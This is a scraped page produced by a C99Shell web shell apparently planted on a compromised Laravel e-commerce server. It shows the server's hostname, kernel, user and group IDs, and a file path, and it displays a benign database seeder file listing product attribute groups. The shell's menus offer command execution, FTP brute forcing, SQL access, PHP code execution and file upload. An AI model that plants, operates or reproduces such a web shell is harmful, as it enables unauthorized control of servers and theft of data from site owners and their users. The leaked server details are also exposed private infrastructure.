!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/database/seeders/   drwxr-xr-x
Free 27.73 GB of 117.98 GB (23.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AttributeGroupsTableSeeder.php (2.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Database\Seeders;

use 
Illuminate\Database\Seeder;

class 
AttributeGroupsTableSeeder extends Seeder
{

    
/**
     * Auto generated seed file
     *
     * @return void
     */
    
public function run()
    {


        
\DB::table('attribute_groups')->delete();

        
\DB::table('attribute_groups')->insert(array (
            
=>
            array (
                
'id' => 28,
                
'vendor_id' => 1,
                
'name' => 'smartphone_Attributes',
                
'summary' => 'This is the attribute group that contains body attributes of smartphone',
                
'status' => 'Active',


            ),
            
=>
            array (
                
'id' => 29,
                
'vendor_id' => 1,
                
'name' => 'Feature_Phone_Attributes',
                
'summary' => 'This is the attribute group that contains body attributes of Feature Phone',
                
'status' => 'Active',


            ),
            
=>
            array (
                
'id' => 30,
                
'vendor_id' => 1,
                
'name' => 'body',
                
'summary' => NULL,
                
'status' => 'Inactive',


            ),
            
=>
            array (
                
'id' => 31,
                
'vendor_id' => NULL,
            
'name' => 'Body(Sneakers)',
                
'summary' => 'This is the attribute group that contains body attributes of  sneakers',
                
'status' => 'Inactive',


            ),
            
=>
            array (
                
'id' => 32,
                
'vendor_id' => 1,
                
'name' => 'Laptop_Attributes',
                
'summary' => 'This is the attribute group that contains body attributes of  laptops',
                
'status' => 'Active',


            ),
            
=>
            array (
                
'id' => 33,
                
'vendor_id' => 1,
                
'name' => 'Cameras_Attributes',
                
'summary' => 'This is the attribute group that contains body attributes of cameras',
                
'status' => 'Active',


            ),
        ));


    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--